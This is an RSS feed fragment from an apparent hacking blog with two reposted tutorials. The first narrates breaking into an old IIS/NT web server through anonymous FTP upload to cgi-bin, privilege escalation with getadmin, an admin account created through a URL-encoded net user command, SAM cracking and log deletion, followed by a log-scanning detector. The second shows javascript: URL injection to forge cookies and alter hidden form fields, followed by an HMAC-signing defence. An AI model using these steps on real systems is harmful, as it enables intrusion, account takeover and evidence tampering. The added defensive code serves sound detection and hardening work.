		<description><![CDATA[The exact methods may not work, but we aren’t here to train script kiddies, we just want to make you think.
Johnny Hacker has a Windows NT Server at home. Why? Because he knows if he’s going to hack NT he’s best using the same type of computer…it gives him all the necessary tools. He has [...]]]></description>
			<content:encoded><![CDATA[<p>The exact methods may not work, but we aren’t here to train script kiddies, we just want to make you think.</p>
<p>Johnny Hacker has a Windows NT Server at home. Why? Because he knows if he’s going to hack NT he’s best using the same type of computer…it gives him all the necessary tools. He has installed RAS and has a dial-up connection to the Internet. One morning, around 2:00am he dials into the Internet…his IP address is dynamically assigned to him. He opens up a Command Prompt window and gets down to work. He knows www.company.com’s web server is running IIS. How? Because he once did a search on “batch files as CGI” using Excite’s search engine. That phrase is in Chapter 8 of Internet Information Server’s on-line help….and unfortunately it’s been indexed by Excite’s spider…now Johnny has a list of around 600 web servers running IIS.</p>
<p><span class="fullpost"></p>
<p>He ftps to www.company.com. He isn’t even sure yet if the server is running the ftp service. He knows if he gets a connection refused message it won’t be…he’s in luck though…the following appears on the screen:</p>
<p>C:\ftp www.company.com<br />Connected to www.company.com.<br />220 saturn Microsoft FTP Service (Version 3.0).<br />User (www.company.com:(none)):</p>
<p>This connection message tells him something extremely important: the NetBIOS name of the server, SATURN. From this he can deduce the name of the anonymous internet account that NT uses to let people anonymously use the WWW, FTP and Gopher services on the machine. If the default account hasn’t been changed, and he knows it is very rare for it to have been changed, the anonymous internet account will be called IUSR_SATURN. This information will be needed later if he’s to gain Administrator access to the machine. He enters “anonymous” as the user and the following appears:</p>
<p>331 Anonymous access allowed, send identity (e-mail name) as password.<br />Password:</p>
<p>Johnny often tries the “guest” account before using “anonymous” as the user. A fresh install of NT has the “guest” account disabled but some admins enable this account….and the funny thing is they usually put a weak password on it such as ‘guest’ or no password at all. If he manages to gain access to the ftp service with this account he has a valid NT user account….everything that the “guest” account has access to…so does Johnny, and sometimes that can be almost everything. He knows he can access their site now…but there is still a long way to go yet….even at this point he still might not get access. At this point he doesn’t even supply a password…he just presses enter and gets a message stating that the Anonymous user is logged in.</p>
<p>First off he types “cd /c” because some admins will make the root of the drive a virtual ftp directory and leave the default alias name: “/c”. Next he sees whether he can actually “put” any files onto the site, i.e. whether the write permission is enabled for this ftp site. He’s in luck. Next he types “dir” to see what he has access to. He chuckles to himself when he sees a directory called “CGI-BIN”. Obviously the Webmaster of the NT machine has put this here with the rest of the WWW site so he can remotely make changes to it. Johnny knows that the CGI-BIN has the “Execute” permission so if he can manage to put any program in here he can run it from his web browser. He hopes that the Webmaster hasn’t, using NTFS file-level security, cut off write access to this directory for the anonymous internet account…even though he knows there are sometimes ways round this. He changes to the CGI-BIN directory and then changes the type to I by using the command “binary”. Then he types “put cmd.exe”. He’s in luck…he gets the following response:</p>
<p>200 PORT command successful.<br />150 Opening BINARY mode data connection for CMD.EXE.<br />226 Transfer complete.<br />208144 bytes sent in 0.06 seconds (3469.07 Kbytes/sec)</p>
<p>Next he puts getadmin.exe and gasys.dll into the same directory. With these three files in place he doesn’t even gracefully “close” the ftp session; he just closes the Command Prompt window. With a smile on his face he leans back and lights a smoke, savouring the moment…he knows he has them…. After crunching the cigarette out in an overflowing ashtray he connects to AOL. He does this because if logging is enabled on the NT machine the IP address of AOL’s proxy server will be left and not his own…not that it really matters because soon he’ll edit the logfile and wipe all traces of his presence. Opening up the web browser he enters the following URL:</p>
<p>http://www.company.com/cgi-bin/getadmin.exe?IUSR_SATURN</p>
<p>After about a fifteen second wait the following appears on his web browser:</p>
<p>CGI Error<br />The specified CGI application misbehaved by not returning a complete set of<br />HTTP headers. </p>
<p>The headers it did return are:</p>
<p>Congratulations , now account IUSR_SATURN have administrator rights! </p>
<p>He has just made the anonymous internet account a local administrator and consequently using this account he can do pretty much what he wants to. Firstly though, he has to create an account for himself that he can use to connect to the NT server using NT Explorer and most of the Administrative tools. He can’t use the IUSR_SATURN account because he doesn’t know the randomly generated password. To create an account he enters the following URL:</p>
<p>cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20cnn%20news%20/add</p>
<p>He has just created an account called “cnn” with the password “news”. To make the account a local administrator he enters the following URL:</p>
<p>http://www.company.com/cgi-bin/getadmin.exe?cnn</p>
<p>It has taken him less than ten minutes to do all of this. He disconnects from AOL and clicks on Start, goes up to Find and does a search for the computer www.company.com. After about a minute the computer is found, next he right clicks on the “computer” and then clicks on Explore. NT Explorer opens and after a little wait Johnny is prompted for a user-name and password. He enters “cnn” and “news”. Moments later he is connected. Admin rights for the computer www.company.com are appended to his own security access token…now he can do anything. Using User Manager for Domains he can retrieve all the account information; he can connect to the Internet Service Manager; he can view Server Manager…first though, using NT Explorer he maps a drive to the hidden system share C$. He changes to the Winnt\system32\logfiles directory and opens up the logfile for that day. He deletes all of the log entries pertaining to his “visit” and saves it. If he gets any message about sharing violations all he has to do is change the date on the computer with the following URL:</p>
<p>http://www.company.com/cgi-bin/cmd.exe?/c%20date%2002/02/98</p>
<p>Next, using the Registry Editor he connects to the registry on the remote computer. Then using L0phtcrack he dumps the SAM (the Security Accounts Manager &#8211; holds account info) on the NT server and begins cracking all the passwords on the machine. Using the Task Manager he sets the priority to Low because L0phtcrack is fairly processor intensive (NB L0phtcrack ver 2.0 sets the priority to Low anyway) and there are still a few things he must do to hide the fact that someone has gained entry. He deletes cmd.exe, getadmin.exe and gasys.dll from the cgi-bin, then he checks the security event log for the remote NT server using Event Viewer to see if he’s left any traces there.</p>
<p>Finally, using User Manager for Domains he removes admin rights from the IUSR_SATURN account and deletes the cnn account he created a few moments earlier. He doesn’t need this account anymore….L0phtcrack will be able to brute force all the accounts. Next time he connects to this machine it will be using the Administrator account. He breaks his connection to the Internet and sets L0phtcrack’s priority to High, leaves it running and heads to bed…Looking at his alarm clock: it has just passed 2:30am….Sighing to himself, he mumbles, “Sheesh, I’m getting slow!” and falls asleep with a grin on his face.</p>
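<p>The story above leaves a trail in the IIS log that it ends by editing. As an added example, not from the original article, this Python script parses a constructed W3C-format log excerpt (the #Fields line, addresses, status codes and timestamps are all made up; 203.0.113.7 is a documentation address standing in for the attacker’s proxy) and flags the requests that fetch the dropped tools or carry a URL-encoded command in the query string, the way a defender reviewing logs shipped off the box would catch this cgi-bin abuse.</p>

```python
import re
from urllib.parse import unquote

# Constructed W3C extended log excerpt (not from the article) for the story's requests;
# 203.0.113.7 is a documentation address standing in for the attacker's proxy.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Server
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
1998-02-02 02:05:11 10.0.0.5 GET /default.htm - 200
1998-02-02 02:07:40 203.0.113.7 GET /cgi-bin/getadmin.exe IUSR_SATURN 502
1998-02-02 02:08:03 203.0.113.7 GET /cgi-bin/cmd.exe /c%20c:\winnt\system32\net.exe%20user%20cnn%20news%20/add 200
1998-02-02 02:08:30 203.0.113.7 GET /cgi-bin/getadmin.exe cnn 502
1998-02-02 02:09:12 203.0.113.7 GET /cgi-bin/cmd.exe /c%20date%2002/02/98 200
1998-02-02 02:10:00 10.0.0.9 GET /cgi-bin/search.exe q=ntfs 200
"""

# Files the story uploads into CGI-BIN and then requests through the browser.
DROPPED_TOOLS = {"cmd.exe", "getadmin.exe", "gasys.dll"}

# Command fragments to look for once the query string is URL-decoded.
COMMAND_PATTERNS = [
    ("cmd /c switch", re.compile(r"(^|\s)/c\s", re.I)),
    ("net user/localgroup", re.compile(r"\bnet(\.exe)?\s+(user|localgroup)\b", re.I)),
    ("account creation", re.compile(r"\s/add\b", re.I)),
    ("system clock change", re.compile(r"\bdate\s+\d{2}/\d{2}/\d{2}\b", re.I)),
]


def parse_w3c(log_text):
    """Yield one dict per entry, using the #Fields header for column names."""
    fields = None
    for line in log_text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("log entry before #Fields header")
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # skip malformed lines rather than guess at columns
        yield dict(zip(fields, values))


def classify(entry):
    """Return (decoded query, reasons) for one entry; empty reasons means benign."""
    stem = entry.get("cs-uri-stem", "")
    query = entry.get("cs-uri-query", "-")
    decoded = "" if query == "-" else unquote(query)
    reasons = []
    name = stem.rsplit("/", 1)[-1].lower()
    if name in DROPPED_TOOLS:
        reasons.append("request for " + name)
    for label, pattern in COMMAND_PATTERNS:
        if pattern.search(decoded):
            reasons.append(label)
    return decoded, reasons


def suspicious_requests(log_text):
    """Every entry that requests a dropped tool or carries a command in its query."""
    findings = []
    for entry in parse_w3c(log_text):
        decoded, reasons = classify(entry)
        if reasons:
            findings.append({
                "time": entry["date"] + " " + entry["time"],
                "client": entry["c-ip"],
                "stem": entry["cs-uri-stem"],
                "query": decoded,
                "reasons": reasons,
            })
    return findings


def offenders(findings):
    """Count findings per client address."""
    counts = {}
    for finding in findings:
        counts[finding["client"]] = counts.get(finding["client"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in suspicious_requests(SAMPLE_LOG):
        print(f["time"], f["client"], f["stem"], f["query"], "|", ", ".join(f["reasons"]))
```

<p>The decisive detail is that the attacker’s last step is to edit the log on the server itself, so a check like this only helps when log lines are copied off the box as they are written. The tool names and command fragments are the ones the story uses; a real rule set would be broader.</p>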
<p>The original filename was ntremote.txt &#8211; Author Unknown<br /></span></p>
]]></content:encoded>
			<wfw:commentRss>http://ankitkumaragarwal.com/windows-ftp-hacking/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
<title>Javascript injections</title>
		<link>http://ankitkumaragarwal.com/javascrit-injections/</link>
		<comments>http://ankitkumaragarwal.com/javascrit-injections/#comments</comments>
		<pubDate>Sun, 12 Oct 2008 11:45:00 +0000</pubDate>
		<dc:creator>Ankit Kumar Agarwal</dc:creator>
				<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[script]]></category>

		<guid isPermaLink="false">http://ankitkumaragarwal.com/?p=4</guid>
		<description><![CDATA[Today I have brought  for you another type of exploit of browser that is Javascript Injection.  Javascript injection is a nifty little technique that allows you to alter a  sites contents without actually leaving the site. This can be very usefull when  say, you need to spoof the server by editing [...]]]></description>
			<content:encoded><![CDATA[<p>Today I have brought for you another type of browser exploit: Javascript injection. Javascript injection is a nifty little technique that lets you alter a site’s contents without actually leaving the site. This can be very useful when, say, you need to spoof the server by editing some form options. Examples are explained throughout.<br />
<br /><span class="fullpost"></p>
<p><span style="font-weight: bold; font-size: 130%;">Injection  Basics</span></p>
<p>Javascript injections are run from the URL bar of the page you are visiting. To use them, you must first completely empty the URL bar. That means no http:// or anything else.<br />
<br /><span class="fullpost"><br />
<br />Javascript is run from the URL bar by using the javascript:  protocol. In this tutorial I will only teach you the bare bones of using this,  but if you are a Javascript guru, you can expand on this using plain old  javascript.</p>
<p>The two commands covered in this tutorial are the alert();  and void(); commands. These are pretty much all you will need in most  situations. For your first javascript, you will make a simple window appear,  first go to any website and then type the following into your URL  bar:</p>
<p><span style="font-weight: bold; color: rgb(255, 0, 0);">javascript:alert('Hello, World');</span></p>
<p>You should get a little dialog box that says &#8220;Hello,  World&#8221;. This will be altered later to have more practical uses.</p>
<p>You can  also have more than one command run at the same time:</p>
<p><span style="font-weight: bold; color: rgb(255, 0, 0);">javascript:alert('Hello'); alert('World');</span></p>
<p>This would pop up a box that says ‘Hello’ and then another that says ‘World’.</p>
<p><span style="font-size: 130%;"><span style="font-weight: bold;">Cookie Editing</span></span></p>
<p>First off, check  to see if the site you are visiting has set any cookies by using this  script:</p>
<p><span style="font-weight: bold; color: rgb(255, 0, 0);">javascript:alert(document.cookie);</span></p>
<p>This  will pop up any information stored in the sites cookies. To edit any  information, we make use of the void(); command.</p>
<p><span style="font-weight: bold; color: rgb(255, 0, 0);">javascript:void(document.cookie="authorized=yes");</span></p>
<p>This would either create the cookie field “authorized” with the value “yes” or overwrite the existing one; whether that achieves anything depends on whether the site you inject it on trusts the cookie’s contents. The void() wrapper matters: without it the browser would replace the page with the result of the expression.</p>
<p>It is also useful to tack an  alert(document.cookie); at the end of the same line to see what effect your  altering had.</p>
<p><span style="font-size: 130%;"><span style="font-weight: bold;">Form Editing</span></span></p>
<p>Sometimes, to edit values sent to a given website through a form, you can simply download that HTML and edit it slightly to let you submit what you want. However, sometimes the website checks whether you actually submitted it from the page you were supposed to. To get around this, we can edit the form straight from javascript. <span style="font-weight: bold;">Note:</span> The changes are only temporary, so it’s no use trying to deface a site through javascript injection like this.</p>
<p>Every form on a given webpage is stored in the document.forms[x] collection, where “x” is the position of the form counting from the top of the page (a named form can also be reached by its name). Note that the index starts at 0, so the first form on the page is forms[0], the second is forms[1] and so on. Take this example:</p>
<p><span style="font-weight: bold; color: rgb(255, 0, 0);">&lt;form action="http://www.website.com/submit.php" method="post"&gt;<br />
&lt;input type="hidden" name="to" value="admin@website.com"&gt;</span></p>
<p>Note:Since this is the first form on  the page, it is forms[0]</p>
<p>Say this form is used to email vital server information to the admin of the website. You can’t just download the page and edit it, because submit.php checks the Referer header. You can check the value of a form element with this script:</p>
<p><span style="font-weight: bold; color: rgb(255, 0, 0);">javascript:alert(document.forms[0].to.value)</span></p>
<p>This is similar to the alert(document.cookie); discussed previously. In this case it would pop up an alert that says “admin@website.com”.</p>
<p>So here&#8217;s how to  Inject your email into it. You can use pretty much the same technique as the  cookies editing shown earlier:</p>
<p><span style="font-weight: bold; color: rgb(255, 0, 0);">javascript:void(document.forms[0].to.value="email@nhacks.com")</span></p>
<p>This  would change the email of the form to be &#8220;email@nhacks.com&#8221;. Then you could use  the alert(); script shown above to check your work. Or you can couple both of  these commands on one line.</p>
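<p>Both edits above, the cookie and the hidden field, only work because the server trusts whatever the browser sends back. As an added example that is not part of the original tutorial, here is the server side in Python: the naive checks a site like the one described would have, next to versions that HMAC-sign the cookie and the hidden field so that a value typed into the URL bar is rejected. The secret, the cookie name and the shape of the form are assumptions of the example.</p>

```python
import hashlib
import hmac
from http.cookies import SimpleCookie

# Assumed server-side secret: in real code it comes from configuration and never reaches the browser.
SECRET = b"constructed-example-secret"


def sign(value):
    """Append an HMAC tag so the browser can read the value but not alter it."""
    tag = hmac.new(SECRET, value.encode(), hashlib.sha256).hexdigest()
    return value + "." + tag


def verify(signed):
    """Return the protected value if its tag checks out, otherwise None."""
    value, sep, tag = signed.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(SECRET, value.encode(), hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(expected.encode(), tag.encode()) else None


def cookie_value(header, name):
    """Pull one cookie out of a Cookie request header."""
    jar = SimpleCookie()
    jar.load(header)
    return jar[name].value if name in jar else None


def is_authorized_naive(header):
    """The trusting check that an injected authorized=yes cookie defeats."""
    return cookie_value(header, "authorized") == "yes"


def is_authorized_signed(header):
    """Same decision on a signed cookie: a value typed into the URL bar has no valid tag."""
    raw = cookie_value(header, "authorized")
    return raw is not None and verify(raw) == "yes"


def recipient_naive(form):
    """Uses the hidden 'to' field exactly as the browser submitted it."""
    return form.get("to")


def recipient_signed(form):
    """Accepts the hidden field only if the server signed it when it rendered the form."""
    return verify(form.get("to", ""))


if __name__ == "__main__":
    forged = "session=abc123; authorized=yes"
    print("naive:", is_authorized_naive(forged), "signed:", is_authorized_signed(forged))
    print("redirected mail:", recipient_naive({"to": "email@nhacks.com"}),
          "| signed:", recipient_signed({"to": "email@nhacks.com"}))
```

<p>Signing protects integrity only: the browser can still read both values, so anything secret belongs in a server-side session rather than in a cookie or a hidden field. The Referer check the tutorial mentions adds nothing against this technique, because the edited form is submitted from the genuine page.</p>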
<p>Credits: unknown<br />
<br /></span><br />
<br /></span></p>
]]></content:encoded>
			<wfw:commentRss>http://ankitkumaragarwal.com/javascrit-injections/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
